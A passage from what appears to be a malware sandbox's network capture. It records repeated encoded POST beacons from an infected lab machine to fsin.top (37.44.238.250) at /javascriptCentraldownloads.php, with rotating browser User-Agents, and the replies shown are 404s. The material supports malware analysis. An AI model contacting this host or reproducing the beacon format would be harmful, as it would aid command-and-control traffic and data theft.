                                                                                    Jan 11, 2025 16:21:00.868391037 CET344OUTData Raw: 00 07 01 06 03 0f 04 00 05 06 02 01 02 02 01 0a 00 02 05 08 02 02 03 09 03 56 0c 0c 04 01 02 02 0a 00 05 0e 02 0d 07 03 0e 54 07 07 05 06 04 00 06 53 0c 0a 0d 07 04 0a 06 50 06 50 07 00 00 09 05 06 0a 00 05 06 04 09 0e 03 0c 05 0d 54 0d 07 06 0d
                                                                                    Data Ascii: VTSPPTS]P\L}Uk`~wLmMaetoi`UtB~p|JoBJx`~|}sTcYU]u~V@zmrA~\u
                                                                                    Jan 11, 2025 16:21:01.161000967 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:21:01.291775942 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:21:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    4192.168.2.46221837.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:21:04.718497992 CET326OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:21:05.071693897 CET344OUTData Raw: 00 03 04 01 06 0e 01 07 05 06 02 01 02 03 01 04 00 0a 05 0f 02 0c 03 08 00 53 0a 00 06 01 01 54 0f 52 07 0b 02 03 04 07 0d 03 06 03 06 04 06 00 04 53 0c 5a 0f 50 05 00 06 0f 04 06 07 02 06 0c 01 04 0d 01 04 0f 05 06 0b 02 0c 01 0c 02 0b 05 04 07
                                                                                    Data Ascii: STRSZPSWRU\L~kYbtbaMwuPhRi`okX|hoBoxN_^m|Ntg`O}O~V@{C\rq
                                                                                    Jan 11, 2025 16:21:05.373030901 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:21:05.505287886 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:21:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    5192.168.2.46225437.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:21:10.445616961 CET326OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:21:10.789875031 CET344OUTData Raw: 05 07 04 0d 06 0d 04 05 05 06 02 01 02 07 01 00 00 04 05 08 02 03 03 0b 07 0f 0c 02 03 04 03 54 0a 04 07 0e 03 06 05 06 0c 00 06 0a 07 50 02 03 07 02 0f 08 0c 07 07 52 01 0e 06 04 06 07 06 0d 05 0a 0f 01 04 0e 07 05 0c 03 0b 02 0d 57 0e 06 07 06
                                                                                    Data Ascii: TPRW\L~|v@c\aOu[p~lX\cl`k`lJxlXzcfI|mhtg`A~u~V@AxCTA~L}
                                                                                    Jan 11, 2025 16:21:11.083199024 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:21:11.212403059 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:21:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    6192.168.2.46227037.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:21:13.237759113 CET326OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:21:13.586749077 CET344OUTData Raw: 05 00 01 02 06 08 01 04 05 06 02 01 02 0d 01 01 00 06 05 01 02 06 03 00 07 04 0f 51 04 07 00 00 0e 00 03 0b 02 51 06 52 0f 03 06 0b 05 56 02 0f 05 0a 0b 0b 0d 52 04 56 06 05 06 50 01 04 05 58 05 05 0d 0c 06 00 04 04 0f 01 0c 53 0e 05 0c 09 07 56
                                                                                    Data Ascii: QQRVRVPXSVW\L~hc~ca~_uhkiOwotO]Z{|glcfDkCpA`Y{]}_~V@xSb}\W
                                                                                    Jan 11, 2025 16:21:13.900506973 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:21:14.045902014 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:21:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    7192.168.2.46229537.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:21:17.127688885 CET326OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:21:17.477488041 CET344OUTData Raw: 05 00 04 06 06 08 01 06 05 06 02 01 02 0d 01 0b 00 02 05 0d 02 02 03 00 03 05 0c 03 07 0e 01 00 0a 01 04 5d 00 0c 05 0b 0d 0a 06 01 04 03 04 06 04 07 0f 59 0c 0e 06 07 06 00 06 04 04 07 04 58 00 0a 0a 00 04 07 07 07 0c 03 0f 07 0f 54 0d 06 04 02
                                                                                    Data Ascii: ]YXTRQ\L}ShcfcamLb\wQkRu`p|Z|{l]xNaZhS]UwgxA~_~V@z}r~\W
                                                                                    Jan 11, 2025 16:21:17.776637077 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:21:17.906582117 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:21:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    8192.168.2.46241037.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:21:37.741867065 CET309OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:21:38.086774111 CET344OUTData Raw: 05 07 04 0c 06 00 01 0a 05 06 02 01 02 06 01 0a 00 04 05 0b 02 0d 03 09 02 56 0e 00 03 0e 01 52 0a 0f 07 0e 02 06 03 03 0f 53 06 02 06 04 07 06 06 0b 0c 59 0d 01 04 0a 06 07 06 04 04 04 07 5b 02 50 0c 0c 00 02 07 06 0e 07 0b 00 0d 51 0f 02 05 02
                                                                                    Data Ascii: VRSY[PQZV\L}Rh^fc\n]a[oTko}cRw]hMk_loslYa^StvwQ[~_~V@BzmTLbu
                                                                                    Jan 11, 2025 16:21:38.419069052 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:21:38.567526102 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:21:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    9192.168.2.46244737.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:04.872351885 CET309OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:05.227802038 CET344OUTData Raw: 00 00 04 02 06 01 01 07 05 06 02 01 02 06 01 07 00 02 05 0f 02 01 03 08 03 01 0d 07 04 55 03 03 0e 0e 06 0b 07 03 04 00 0c 0b 06 04 06 00 05 0e 03 03 0c 5d 0a 03 06 0a 01 01 06 50 06 02 00 0d 00 50 0c 01 05 54 04 03 0c 0f 0e 02 0c 01 0e 05 04 03
                                                                                    Data Ascii: U]PPTV\L~@^e\tLuMbvt|RqOwooX~s]XloxX{YjK|}h`Ihju~V@B{}r~bq
                                                                                    Jan 11, 2025 16:22:05.536540985 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:05.667687893 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    10192.168.2.46244837.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:13.662651062 CET273OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:14.008692980 CET344OUTData Raw: 05 00 01 01 03 0c 01 0a 05 06 02 01 02 03 01 07 00 0b 05 0a 02 05 03 0e 00 03 0d 02 07 00 01 03 0d 05 06 5d 03 0c 04 05 0d 05 06 05 04 01 02 07 03 05 0e 0a 0c 02 06 57 01 05 04 53 06 52 07 0a 05 0b 0d 0d 06 05 06 53 0d 01 0e 55 0f 53 0b 02 04 06
                                                                                    Data Ascii: ]WSRSUSTU\L}T~`y\w\mOa\|AhRb]wR`hM`KoBKlNWZCQcthNu~V@{}PO}bi
                                                                                    Jan 11, 2025 16:22:14.291826010 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:14.423582077 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    11192.168.2.46244937.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:16.565587997 CET261OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:16.915082932 CET344OUTData Raw: 00 00 04 05 06 00 04 07 05 06 02 01 02 06 01 07 00 06 05 08 02 01 03 0a 03 07 0f 04 05 03 02 06 0d 05 03 0d 01 03 03 0a 0d 00 05 51 04 0a 06 0e 06 01 0d 00 0e 00 05 01 04 00 07 54 04 0b 06 0e 05 03 0c 01 07 04 05 07 0b 05 0c 57 0d 0c 0c 55 05 54
                                                                                    Data Ascii: QTWUT_QW\L~@~`a]wr_MbvwR~|eB`lhksw^y|dXl`XDhmxwdcZ~_~V@B{}bA~by
                                                                                    Jan 11, 2025 16:22:17.193934917 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:17.323491096 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    12192.168.2.46245037.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:22.646418095 CET261OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:22.993086100 CET344OUTData Raw: 05 01 04 0c 06 0f 04 01 05 06 02 01 02 07 01 0b 00 0a 05 0c 02 05 03 09 07 06 0e 04 06 0e 01 02 0a 06 06 5b 03 54 04 50 0e 50 04 00 04 01 07 00 07 04 0e 0a 0f 54 07 01 04 05 04 06 06 01 07 0e 03 00 0f 0c 04 04 01 03 0e 55 0f 04 0d 53 0c 01 04 0c
                                                                                    Data Ascii: [TPPTUSU\L}SpbMwrT\bf|O|zXtRw\ksQYxocElYaXCZAvd|AiO~V@Az}\}bu
                                                                                    Jan 11, 2025 16:22:23.293390989 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:23.427356958 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    13192.168.2.46245137.44.238.25080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 11, 2025 16:22:25.001554012 CET309OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                    Host: fsin.top
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Jan 11, 2025 16:22:25.352543116 CET344OUTData Raw: 00 02 01 06 06 0f 01 07 05 06 02 01 02 01 01 02 00 07 05 0f 02 0c 03 0d 03 0e 0a 04 04 0f 06 03 0f 51 04 0a 02 0d 07 0a 0d 07 02 02 07 07 05 04 04 04 0c 01 0d 0f 01 02 06 01 07 54 01 02 00 09 05 04 0f 00 00 04 04 54 0e 00 0e 01 0d 56 0f 06 06 00
                                                                                    Data Ascii: QTTVP[RW\L}SkYzcrT_a[ZA||r]w|Zh]xKxU{zcz}nhto]}u~V@xmfre
                                                                                    Jan 11, 2025 16:22:25.657941103 CET25INHTTP/1.1 100 Continue
                                                                                    Jan 11, 2025 16:22:25.793163061 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Sat, 11 Jan 2025 15:22:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 213
                                                                                    Connection: keep-alive
